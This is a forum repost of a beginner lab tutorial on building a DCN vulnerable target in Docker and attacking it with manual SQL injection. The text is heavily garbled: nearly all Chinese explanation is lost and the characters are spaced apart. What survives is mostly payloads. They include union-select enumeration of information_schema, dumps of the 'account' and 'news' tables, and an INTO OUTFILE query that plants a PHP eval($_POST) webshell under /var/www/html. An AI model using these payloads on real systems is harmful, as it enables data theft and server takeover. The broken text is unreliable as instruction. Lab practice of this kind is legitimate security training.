搜索

[19519] 2019-08-20_【新手篇】搭建DCN漏洞靶机及简单的SQL手工注入

文档创建者:s7ckTeam
浏览次数:35
最后更新:2025-01-18
2019-08-20_【新手篇】搭建DCN漏洞靶机及简单的SQL手工注入 D C N S Q L i   2 0 1 9 - 0 8 - 2 0 使 D o c k e r D o c k e r k a l i D C N k a l i
1 2     P S k a l i D o c k e r 1 D o c k e r 1 P S 绿 a c t i v e r u n n i n g D o c k e r k a l i 1 2 D o c k e r   1 R E P O S I T O R Y     T A G < n o n e > a p t - g e t   i n s t a l l d o c k e r a p t - g e t   i n s t a l l d o c k e r . i o s e r v i c e   d o c k e r   s t a r t s e r v i c e   d o c k e r   s t a t u s d o c k e r   l o a d   <   d c n _ w e b _ t e s t . t a r d o c k e r   l o a d   <   d c n _ u p l o a d . t a r d o c k e r   i m a g e s
1 2 1 访 k a l i I P k a l i 1 9 2 . 1 6 8 . 1 0 . 1 0 0 1 W e b S Q L i 1 1 s u b m i t 2 2 s u b m i t d o c k e r   t a g   [ I M A G E   I D ]   d c n _ w e b _ t e s t : V   1 . 0 d o c k e r   t a g   [ I M A G E   I D ]   d c n _ u p l o a d : V   1 . 0 d o c k e r   r u n   - i t d   - p   8 8 8 8 : 8 0   d c n _ w e b _ t e s t : V   1 . 0 h t t p : / / 1 9 2 . 1 6 8 . 1 0 . 1 0 0 : 8 8 8 8 /
3 3 s u b m i t S Q L 2 i d 3 4 3   o r   1 = 1 s u b m i t 2 p h p 5 使 o r d e r   b y 3   o r   1 = 1   o r d e r   b y   1   d e s c s e l e c t 1 d e s c 3   o r   1 = 1   o r d e r   b y   4   d e s c 4 3 3 p h p
6 u n i o n 1   u n i o n   s e l e c t   1 , 2 , 3 s u b m i t 使 u n i o n p h p i d u n i o n s e l e c t u n i o n o r d e r   b y   1   u n i o n   s e l e c t   3 , 2 , 1   o r d e r   b y   1   d e s c 使 i d i d 3   3   u n i o n   s e l e c t   1 , 2 , 3 s e l e c t 2 3 2 3 7 u n i o n   s e l e c t 2 3   u n i o n   s e l e c t   1 , u s e r (   ) , 3 s u b m i t r o o t p h p M y s q l r o o t 3   u n i o n   s e l e c t   1 , v e r s i o n (   ) , 3 s u b m i t
M y s q l 5 . 0 使 i n f o r m a t i o n _ s c h e m a 8 u n i o n   s e l e c t 2 3   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( t a b l e _ n a m e ) , 3   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e (   ) s u b m i t g r o u p _ c o n c a t (   ) i n f o r m a t i o n _ s c h e m a S Q L S e r v e r M a s t e r i n f o r m a t i o n _ s c h e m a . t a b l e s t a b l e s i n f o r m a t i o n _ s c h e m a m y s q l t a b l e _ s c h e m a t a b l e s d a t a b a s e (   )
S u b m i t a c c o u n t n e w s 9 u n i o n   s e l e c t 2 3   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( c o l u m n _ n a m e ) , 3   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' a c c o u n t ' 3   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( c o l u m n _ n a m e ) , 3   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' n e w s ' 1 0 u n i o n   s e l e c t 2 3 a c c o u n t i d r e s t 3   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( i d ) , g r o u p _ c o n c a t ( r e s t )   f r o m   a c c o u n t a c c o u n t r e s t o w n 3   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( r e s t ) , g r o u p _ c o n c a t ( o w n )   f r o m   a c c o u n t n e w s i d t i t l e
3   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( i d ) , g r o u p _ c o n c a t ( t i t l e )   f r o m   n e w s n e w s t i t l e c o n t e n t 3   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( t i t l e ) , g r o u p _ c o n c a t ( c o n t e n t )   f r o m   n e w s 1 1 u n i o n   s e l e c t 3   u n i o n   s e l e c t   1 , 2 , ' < ? p h p   e v a l ( $ _ P O S T [ d c n ] ) ; ? > '   i n t o   o u t f i l e   ' / v a r / w w w / h t m l / t t t 1 . p h p ' M y s q l L i n u x M y s q l L i n u x D o c k e r     p s   - a u x   M y s q l M y s q l d M y s q l
  / v a r / w w w / h t m l   h t m l c d   / v a r / w w w l s   - l   - d   h t m l   h t m l   / a p p   a p p / a p p w w w - d a t a w w w - d a t a r w x m y s q l M y s q l s e l e c t   / a p p     t e s t - s q l 7 7 7 s e l e c t 3   u n i o n   s e l e c t   1 , 2 , ' < ? p h p   e v a l ( $ _ P O S T [ d c n ] ) ; ? > '   i n t o   o u t f i l e   ' / v a r / w w w / h t m l / t e s t - s q l / t t t 1 . p h p ' s u b m i t < ? p h p   e v a l ( $ _ P O S T [ d c n ] ) ; ? > L i n u x p h p
1 2 s u b m i t g e t U R L
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理